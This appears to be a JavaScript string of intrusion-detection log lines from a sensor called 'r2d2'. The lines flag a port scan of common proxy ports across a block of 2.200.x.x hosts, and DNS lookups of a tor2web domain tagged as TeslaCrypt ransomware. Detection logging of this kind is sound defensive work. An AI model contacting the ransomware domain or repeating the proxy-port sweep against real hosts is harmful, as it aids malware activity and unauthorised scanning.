    '"2021-01-11 02:56:59.000113" r2d2 91.123.157.56 47841,47844,47847,47852,47854,47856,47858,47860,47861,47863,47865,47867,47869,47871,48692,48747,48885,48887,48889,48891,48893,48895,48897,48899,48901,48903,48905,48907,48909,48910,48912,48914,48916,48918,48920,48922,48924,48925,48927,48929,48931,48934,48937,48940,48943,48946,48949,48952,48955,48959,48962,48964,48966,48968,48970,48972,48974,48976,48978,48980,48982,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49201,49204,49208,49211,49214,49234,49237,49240,49244,49248,49251,49254,49260,49263,49267,49271,49275,49279,49282,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49949,49953,49958,49962,49966,50003,50008,50011,50014,50018,50021,50023,50026,50029,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50233,50234,50236,50237,50239,50241,50243,50245,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50338,50340,50343,50344,50346,50348,50350,50352,50355,50356,50359,50360,50363,50366,50369,50372,50375,50378,50381,50384,50386,50388,50390,50392,50394,50396,50398,50400,50402,50404,50406,50408,50411,50414,50417,50420,50423,50426,50428,50431,50433,50435,50437,50439,50441,50443,50445,50446,50447,50448,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50537,50539,50541,50543,50545,50547,50549,50551,50553,50555,50557,50559,50561,50563,50565,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50726,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50981,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,51582,51583,51584,51585,51586,51587,51588,51589,51590,51591,51592,51593,51594,51595,51596,51733,51735,51740,51744,51746,51748,51754,51757,51760,51763,51766,52022,52024,52026,52077,52083,52089,52096,52103,52107,52112,52116,52120,52123,52126,52129,52132,52135,52138,52339,52341,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52375,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52415,52417,52418,52420,52421,52423,52424,52426,52427,52429,52430,52432,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52456,52458,52459,52461,52462,52464,52465,52467,52468,52470,52471,52473,52474,52476,52477,52479,52480,52482,52483,52485,52486,52488,52489,52491,52492,52495,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,53145,53150,53945,53949,53952,53954,53957,53961,53963,53966,53969,53971,53973,53978,54041,54044,54047,54111,54114,54117,54120,54123,54126,54131,54137,54141,54147,54149,54152,54156,54159,54168,54171,54174,54177,54184,57793,57796,57799,57802,57805,57808,57815,57817,57819,57820,57823,57825,57826,57829,57831,57832,57835,57837,57838,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58019,58020,58022,58024,58026,58028,58029,58031,58091,58095,58098,58101,58104,58107,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997 2.200.103.168,2.200.104.12,2.200.104.15,2.200.104.18,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.252,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.4,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.106,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.111,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.150,2.200.105.151,2.200.105.152,2.200.105.153,2.200.105.154,2.200.105.155,2.200.105.156,2.200.105.157,2.200.105.158,2.200.105.159,2.200.105.229,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:56:59.000076" r2d2 91.123.157.56 47467,47469,47471,47473,47475,47478,47480,47484,47486,47488,47490,47551,47561,47563,47564,47565,47568,47577,47580,47585,47591,47597,47603,47606,47608,47611,47615,47841,47847,47850,47852,47856,47858,47860,47861,47863,47867,47869,47871,48368,48372,48379,48383,48387,48396,48400,48411,48420,48424,48429,48437,48441,48445,48449,48454,48458,48462,48692,48747,48885,48887,48889,48891,48893,48895,48897,48899,48901,48903,48905,48907,48909,48910,48912,48914,48916,48918,48920,48922,48924,48925,48927,48929,48931,48934,48937,48940,48943,48946,48949,48952,48955,48959,48962,48964,48966,48968,48970,48972,48974,48976,48978,48980,48982,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49201,49204,49208,49211,49214,49234,49237,49240,49244,49248,49251,49254,49260,49263,49267,49270,49271,49275,49279,49282,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49949,49953,49958,49962,49966,49988,50003,50005,50008,50011,50014,50018,50021,50023,50026,50029,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50233,50234,50236,50237,50239,50241,50243,50245,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50338,50340,50343,50344,50346,50348,50350,50352,50355,50356,50359,50360,50363,50366,50369,50372,50375,50378,50381,50384,50386,50388,50390,50392,50394,50396,50398,50400,50402,50404,50406,50408,50411,50414,50417,50420,50423,50426,50428,50431,50433,50435,50437,50439,50441,50443,50445,50446,50447,50448,50449,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50537,50539,50541,50543,50545,50547,50549,50551,50553,50555,50557,50559,50561,50563,50565,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50726,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50914,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50981,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,51582,51583,51584,51585,51586,51587,51588,51589,51590,51591,51592,51593,51594,51595,51596,51932,51934,51936,51941,51943,51945,51948,51950,51953,51955,51961,52022,52024,52026,52077,52083,52089,52096,52103,52107,52110,52112,52116,52120,52123,52126,52129,52132,52135,52138,52339,52341,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52375,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52415,52417,52418,52420,52421,52423,52424,52426,52427,52429,52430,52432,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52456,52458,52459,52461,52462,52464,52465,52467,52468,52470,52471,52473,52474,52476,52477,52479,52480,52482,52483,52485,52486,52488,52489,52491,52492,52494,52495,52497,52498,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53039,53041,53043,53046,53048,53049,53050,53051,53054,53055,53057,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,53945,53947,53952,53954,53961,53966,53969,53971,53973,53975,53978,54042,54045,54048,54050,54052,54054,54056,54063,54066,54069,54072,54075,54078,54248,54251,54255,54261,54264,54270,54273,54276,54279,54285,54287,54290,54293,54296,54302,54305,54359,54363,54367,54371,54373,54375,54376,54378,54382,54388,54390,54727,54733,54736,54738,54741,54747,54776,54844,55424,55433,55440,55447,55451,55455,55459,55468,55472,55477,55485,57139,57815,57817,57820,57823,57826,57829,57832,57835,57838,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58020,58022,58024,58026,58028,58029,58031,58091,58095,58098,58101,58104,58107,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997,59105,59111,59115,59118,59122,59126,59130,59198,59207,59211,59215,65286,65290,65293,65303,65307,65316 2.200.103.188,2.200.104.12,2.200.104.13,2.200.104.140,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.2,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.252,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.28,2.200.104.3,2.200.104.43,2.200.104.6,2.200.104.90,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.106,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.111,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.150,2.200.105.151,2.200.105.152,2.200.105.153,2.200.105.154,2.200.105.155,2.200.105.156,2.200.105.157,2.200.105.158,2.200.105.159,2.200.105.229,2.200.105.230,2.200.105.232,2.200.105.234,2.200.105.237,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:07.942644" r2d2 2.200.110.232 64040 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:56:59.000074" r2d2 91.123.157.56 3041,3042,3044,3045,3046,3048,3051,25716,39665,47467,47471,47473,47475,47477,47478,47484,47486,47488,47492,47494,47548,47552,47556,47560,47575,47578,47581,47583,47587,47593,47596,47599,47602,47605,47609,47797,47800,47805,47809,47812,47814,47820,47823,47829,47832,47835,47838,47841,47847,47852,47854,47856,47858,47860,47861,47862,47864,47866,47867,47868,47869,47871,47872,47878,47881,47937,47948,47951,47953,47959,47962,47965,47968,47970,47973,47976,48400,48406,48411,48420,48424,48429,48433,48437,48445,48454,48458,48692,48747,48885,48887,48889,48891,48893,48895,48897,48899,48901,48903,48905,48907,48909,48910,48912,48914,48916,48918,48920,48922,48924,48925,48927,48929,48931,48934,48937,48940,48943,48946,48949,48952,48955,48959,48962,48964,48966,48968,48970,48972,48974,48976,48978,48980,48982,48984,48986,48988,48990,48992,48994,48998,49001,49004,49008,49012,49016,49020,49024,49027,49030,49034,49038,49042,49045,49048,49051,49054,49057,49060,49063,49066,49069,49072,49075,49121,49122,49124,49126,49129,49131,49133,49135,49137,49138,49140,49142,49144,49146,49148,49150,49152,49153,49154,49155,49157,49159,49160,49161,49162,49163,49165,49167,49169,49171,49174,49177,49180,49183,49186,49189,49192,49195,49198,49201,49204,49208,49211,49214,49234,49237,49240,49242,49244,49245,49247,49248,49250,49251,49253,49254,49257,49258,49260,49263,49267,49270,49271,49273,49275,49277,49279,49282,49285,49287,49289,49291,49292,49295,49296,49298,49301,49302,49305,49306,49308,49309,49312,49313,49316,49317,49321,49323,49324,49326,49327,49328,49329,49330,49331,49332,49333,49334,49335,49336,49337,49338,49340,49341,49343,49344,49346,49347,49349,49350,49352,49353,49355,49357,49358,49360,49361,49363,49364,49366,49367,49369,49370,49372,49373,49375,49376,49378,49379,49381,49382,49436,49439,49440,49442,49443,49445,49446,49448,49449,49451,49452,49454,49455,49457,49458,49460,49462,49464,49466,49469,49470,49473,49475,49478,49479,49484,49485,49487,49488,49491,49493,49496,49497,49501,49502,49504,49505,49507,49508,49511,49512,49514,49515,49516,49517,49519,49521,49524,49527,49529,49531,49533,49535,49537,49540,49542,49546,49549,49552,49555,49558,49622,49625,49628,49632,49637,49641,49646,49650,49652,49655,49660,49661,49664,49668,49670,49673,49677,49682,49687,49692,49712,49715,49717,49797,49800,49803,49806,49809,49812,49817,49820,49823,49826,49829,49833,49836,49843,49846,49849,49852,49854,49857,49859,49861,49864,49867,49869,49870,49873,49874,49877,49878,49881,49884,49886,49888,49890,49893,49894,49897,49898,49901,49903,49907,49926,49930,49934,49937,49941,49945,49949,49953,49958,49962,49966,50003,50005,50008,50011,50014,50018,50021,50023,50026,50029,50033,50034,50035,50036,50037,50038,50039,50040,50041,50042,50043,50044,50045,50046,50047,50048,50049,50050,50051,50052,50053,50054,50055,50056,50057,50058,50059,50060,50061,50062,50063,50064,50065,50066,50067,50068,50069,50070,50071,50072,50073,50074,50075,50076,50077,50078,50079,50080,50081,50082,50083,50084,50085,50086,50088,50090,50092,50094,50096,50098,50101,50103,50105,50107,50109,50111,50113,50115,50117,50119,50121,50123,50125,50127,50129,50132,50134,50136,50138,50140,50142,50144,50146,50148,50150,50152,50154,50156,50158,50160,50162,50164,50166,50168,50170,50172,50174,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196,50198,50200,50203,50205,50207,50209,50211,50213,50215,50216,50219,50221,50222,50224,50226,50228,50230,50232,50233,50234,50236,50237,50239,50241,50243,50245,50247,50249,50250,50252,50254,50256,50258,50260,50261,50263,50265,50267,50269,50271,50273,50275,50277,50279,50280,50283,50285,50287,50289,50291,50293,50296,50298,50300,50302,50303,50324,50326,50328,50329,50331,50333,50335,50337,50338,50340,50343,50344,50346,50348,50350,50352,50355,50356,50359,50360,50363,50366,50369,50372,50375,50378,50381,50384,50386,50388,50390,50392,50394,50396,50398,50400,50402,50404,50406,50408,50411,50414,50417,50420,50423,50426,50428,50431,50433,50435,50437,50439,50441,50443,50445,50446,50447,50448,50449,50450,50451,50452,50453,50454,50455,50456,50457,50458,50459,50462,50463,50465,50467,50468,50470,50471,50473,50475,50477,50479,50481,50491,50493,50495,50497,50499,50501,50503,50505,50507,50509,50511,50513,50514,50515,50516,50517,50518,50519,50521,50523,50525,50527,50529,50531,50533,50535,50537,50539,50541,50543,50545,50547,50549,50551,50553,50555,50557,50559,50561,50563,50565,50631,50633,50635,50637,50639,50641,50643,50645,50646,50648,50649,50651,50652,50654,50655,50657,50658,50660,50661,50663,50664,50666,50667,50669,50670,50672,50673,50675,50676,50678,50679,50681,50682,50684,50686,50688,50690,50692,50694,50696,50698,50700,50702,50703,50705,50706,50708,50710,50712,50714,50716,50718,50720,50722,50724,50726,50728,50730,50732,50733,50735,50738,50803,50804,50805,50806,50807,50808,50809,50810,50811,50812,50813,50814,50815,50816,50817,50818,50819,50820,50821,50822,50823,50824,50825,50826,50827,50828,50829,50830,50831,50832,50833,50834,50835,50836,50837,50838,50839,50840,50841,50842,50843,50844,50845,50846,50847,50848,50849,50850,50851,50852,50853,50854,50855,50856,50857,50858,50859,50860,50861,50862,50863,50864,50865,50866,50867,50868,50869,50870,50871,50872,50873,50874,50875,50876,50877,50878,50879,50880,50881,50882,50883,50884,50885,50886,50887,50888,50889,50890,50891,50892,50893,50894,50895,50896,50897,50898,50899,50900,50901,50902,50903,50905,50906,50908,50911,50914,50917,50920,50923,50925,50927,50930,50934,50936,50939,50943,50946,50949,50951,50953,50954,50955,50956,50957,50958,50959,50960,50961,50962,50963,50964,50965,50966,50967,50968,50969,50970,50971,50972,50973,50974,50975,50976,50977,50978,50979,50980,50981,50982,50983,50984,50986,50987,50988,50989,50991,50992,50995,50998,51001,51004,51006,51009,51012,51015,51018,51021,51023,51026,51028,51031,51034,51036,51038,51041,51043,51045,51047,51049,51051,51053,51055,51084,51085,51087,51088,51091,51094,51096,51099,51102,51105,51108,51221,51223,51225,51227,51228,51230,51232,51235,51237,51239,51240,51242,51245,51248,51251,51253,51582,51583,51584,51585,51586,51587,51588,51589,51590,51591,51592,51593,51594,51595,51596,52022,52024,52026,52077,52083,52089,52096,52103,52107,52112,52116,52120,52123,52126,52129,52132,52135,52138,52339,52341,52344,52346,52348,52350,52352,52354,52356,52358,52360,52362,52364,52366,52369,52372,52375,52378,52381,52384,52387,52390,52393,52396,52399,52402,52403,52405,52406,52408,52409,52411,52412,52414,52415,52417,52418,52420,52421,52423,52424,52426,52427,52429,52430,52432,52433,52435,52436,52438,52440,52441,52443,52444,52446,52447,52449,52450,52452,52453,52455,52456,52458,52459,52461,52462,52464,52465,52467,52468,52470,52471,52473,52474,52476,52477,52479,52480,52482,52483,52485,52486,52488,52489,52491,52492,52494,52495,52497,52498,52500,52502,52504,52506,52508,52510,52513,52515,52517,52519,52521,52523,52525,52528,52530,52532,52534,52536,52539,52541,52543,52545,52547,52550,52552,52553,52556,52558,52561,52564,52567,52570,52573,52576,52579,52582,52585,52588,52591,52594,52597,52600,52603,52605,52607,52610,52613,52615,52618,52621,52623,52625,52628,52630,52632,52634,52636,52639,52640,52642,52644,52646,52648,52703,52705,52706,52708,52711,52714,52718,52720,52722,52723,52810,52812,52814,52816,52818,52822,52825,52826,52827,52829,52835,52837,52916,52918,52920,52924,52928,52930,52932,52934,52938,52942,52944,52968,52971,52975,52978,52982,52986,52990,52994,52998,53002,53006,53010,53013,53016,53018,53022,53081,53084,53086,53088,53090,53092,53094,53095,53097,53099,53101,53103,53105,53193,53199,53201,53203,53204,53207,53211,53212,53214,53216,53218,53220,54008,54010,54014,54016,54018,54020,54024,54027,54029,54036,54039,54137,54141,54144,54149,54152,54156,54165,54171,54177,54180,54184,54359,54363,54365,54371,54373,54376,54378,54382,54386,54390,54392,54778,54780,54782,54786,54790,54792,54795,54797,54801,54804,54808,55007,55013,55014,55017,55021,55023,55026,55029,55031,55037,55040,55424,55430,55433,55444,55447,55451,55455,55459,55464,55468,55472,57815,57817,57820,57823,57826,57829,57832,57835,57838,57950,57953,57958,58002,58003,58004,58005,58006,58007,58008,58009,58010,58011,58012,58013,58014,58015,58017,58018,58020,58022,58024,58026,58028,58029,58031,58049,58055,58058,58064,58067,58073,58086,58091,58095,58098,58101,58104,58107,58474,58699,58745,58749,58752,58756,58760,58764,58768,58772,58776,58779,58783,58787,58790,58793,58796,58800,58803,58805,58808,58811,58814,58817,58820,58889,58894,58896,58898,58900,58902,58904,58906,58908,58910,58989,58993,58997,62759,62761,62763,62765,62767,62769,62771,62775,62777,62783,62787,65321,65327 2.200.103.160,2.200.103.183,2.200.103.188,2.200.103.238,2.200.104.0,2.200.104.15,2.200.104.178,2.200.104.179,2.200.104.192,2.200.104.193,2.200.104.194,2.200.104.195,2.200.104.196,2.200.104.197,2.200.104.198,2.200.104.199,2.200.104.200,2.200.104.201,2.200.104.202,2.200.104.203,2.200.104.204,2.200.104.205,2.200.104.206,2.200.104.207,2.200.104.240,2.200.104.241,2.200.104.242,2.200.104.243,2.200.104.244,2.200.104.245,2.200.104.246,2.200.104.247,2.200.104.248,2.200.104.249,2.200.104.250,2.200.104.251,2.200.104.252,2.200.104.253,2.200.104.254,2.200.104.255,2.200.104.5,2.200.104.8,2.200.104.89,2.200.104.90,2.200.105.100,2.200.105.101,2.200.105.102,2.200.105.103,2.200.105.104,2.200.105.105,2.200.105.106,2.200.105.107,2.200.105.108,2.200.105.109,2.200.105.110,2.200.105.111,2.200.105.112,2.200.105.113,2.200.105.114,2.200.105.115,2.200.105.116,2.200.105.117,2.200.105.118,2.200.105.119,2.200.105.120,2.200.105.121,2.200.105.122,2.200.105.123,2.200.105.124,2.200.105.125,2.200.105.126,2.200.105.127,2.200.105.129,2.200.105.144,2.200.105.145,2.200.105.146,2.200.105.147,2.200.105.148,2.200.105.149,2.200.105.150,2.200.105.151,2.200.105.152,2.200.105.153,2.200.105.154,2.200.105.155,2.200.105.156,2.200.105.157,2.200.105.158,2.200.105.159,2.200.105.224,2.200.105.227,2.200.105.229,2.200.105.230,2.200.105.232,2.200.105.233,2.200.105.238,2.200.105.96,2.200.105.97,2.200.105.98,2.200.105.99 80,81,808,3128,3129,3130,8000,8080,8081,8090,8118,8888,9090,9999,53281 TCP IP 91.123.157.56 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:57:08.004670" r2d2 2.200.110.233 65318 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
